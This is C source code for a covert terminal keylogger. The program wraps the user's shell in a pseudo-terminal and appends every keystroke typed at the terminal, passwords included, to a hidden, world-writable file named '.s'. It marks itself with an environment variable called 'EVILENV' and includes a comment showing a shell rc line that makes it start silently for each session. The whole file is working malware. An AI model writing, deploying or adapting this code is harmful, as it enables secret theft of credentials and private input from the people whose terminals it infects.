#include <sys/ioctl.h>
#include <termios.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <stdlib.h>


#ifdef FreeBSD
#include <libutil.h>
#endif
#if defined SunOS
#include <sys/stropts.h>
#endif

#define LOG  		".s"
#define SH   		"/bin/sh"
#define EVILENV		"SBASH"

/*
if [ -z "$SBASH" ]; then exec bash; fi
*/

int got_sigwinch;
int got_sigchld;


void sighandler( int signum ){
  if( signum == SIGWINCH ){
    got_sigwinch = 1;
    signal( signum, sighandler );
  }
  if( signum == SIGCHLD  ){
    got_sigchld  = 1;
  }
}

int main(int argc, char **argv){
 int out,pty,tty,pid;
 char *sh;


if(getenv("SHELL")==NULL) sh=SH;
else sh=getenv("SHELL");


if(getenv(EVILENV)==NULL){

    char *slave;
  setenv(EVILENV, "1", 0);
  if(isatty(0)==1){

      setpgid(0,0);


#if defined SunOS
    pty = open( "/dev/ptmx", O_RDWR | O_NOCTTY);
    grantpt( pty );
    unlockpt( pty );
    slave = ptsname( pty );
    tty = open( slave, O_RDWR | O_NDELAY | O_NONBLOCK);
	ioctl( tty, I_PUSH, "ptem" );
	ioctl( tty, I_PUSH, "ldterm" );
	ioctl( tty, I_PUSH, "ttcompat" );
#else

	openpty( &pty, &tty, NULL, NULL, NULL );
	slave=ttyname( tty );
#endif
      if( slave != NULL ){

        if((pid=fork())==0){
          close(pty);
          setsid();

#if ! defined SunOS
          ioctl(tty, TIOCSCTTY, NULL);
#endif


          dup2(tty,0);
          dup2(tty,1);
          dup2(tty,2);
          close(tty);
          execv(sh,argv);
          return 0;
        }
        else if(pid>0){

    if((out=open(LOG, O_WRONLY|O_CREAT|O_APPEND,0777))>0){

          struct termios termbuf,termdef,termtest;
          struct winsize ws;
          int max,retr,retw;
          char c[4096];
          fd_set in;

          close(tty);
          ioctl(   0, TIOCGWINSZ, &ws );
          ioctl( pty, TIOCSWINSZ, &ws );

          got_sigwinch = 0;
          got_sigchld  = 0;

          signal( SIGWINCH, sighandler );
          signal( SIGCHLD,  sighandler );

          tcgetattr(0, &termbuf);
          termdef=termbuf;



          termbuf.c_lflag &= ~(ECHO|ECHOE|ECHOK|ECHONL|ECHOCTL);
          termbuf.c_lflag &= ~(ICANON|ISIG|IEXTEN );

          termbuf.c_lflag &= ~(ICANON|ISIG|IEXTEN );
          termbuf.c_lflag &= ~(ECHO|ECHOE|ECHOK|ECHONL|ECHOCTL);
          termbuf.c_lflag &= ~(ECHOPRT|ECHOKE|FLUSHO|PENDIN);
          termbuf.c_lflag |= NOFLSH;
          termbuf.c_iflag &= ~(IXOFF|IXON|ICRNL|IMAXBEL|BRKINT);

            if(((termbuf.c_iflag & INPCK) != INPCK) ||  ((termbuf.c_cflag & PARENB) != PARENB)) {
              termbuf.c_iflag &= ~ISTRIP;
              termbuf.c_iflag |= IGNPAR;
              termbuf.c_iflag &= ~PARMRK;
            } 
          termbuf.c_oflag &= ~(OPOST|ONLCR|OCRNL|ONLRET);
	  termbuf.c_cc[VMIN]=1;
          tcsetattr(0, TCSANOW, &termbuf);
            while( 1 ){
              FD_ZERO( &in );
              FD_SET( pty, &in );
              FD_SET(   0, &in );


              max=(pty>0)?pty:0;

                if( select( max+1, &in, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0 ){
                  if( errno == EINTR || errno == EAGAIN )goto check_sigs;
                    break;
                }

                if( FD_ISSET( pty, &in ) ){
                  retr = read( pty, &c, 4096 );
                  retw=write (   1, &c, retr );
                    if( retw <= 0 || retr<=0){
                      if( errno == EINTR || errno == EAGAIN )goto check_sigs;
                      break;
                    }
                }

                if( FD_ISSET( 0, &in ) ){
                  retr = read(   0, &c, 4096 );
                  retw = write( pty, &c, retr);
		  write(out,&c,retr);
                    if( retw <= 0 || retr<=0){
                      if( errno == EINTR || errno == EAGAIN )goto check_sigs;
                      break;
                    }
                }
check_sigs:
                if( got_sigchld  == 1 ){
                  got_sigchld  = 0;
                  break;
                }

                if( got_sigwinch == 1 ){
                  got_sigwinch = 0;
                  ioctl(   0, TIOCGWINSZ, &ws );
                  ioctl( pty, TIOCSWINSZ, &ws );
                  kill ( pid, SIGWINCH );
                }
            }

          tcsetattr(0, TCSANOW, &termdef);
          close(out);
          close(pty);
          return 0;
        }
      }
    }
  }
 unsetenv(EVILENV);
}
 execv(sh,argv);
 return 0;
}

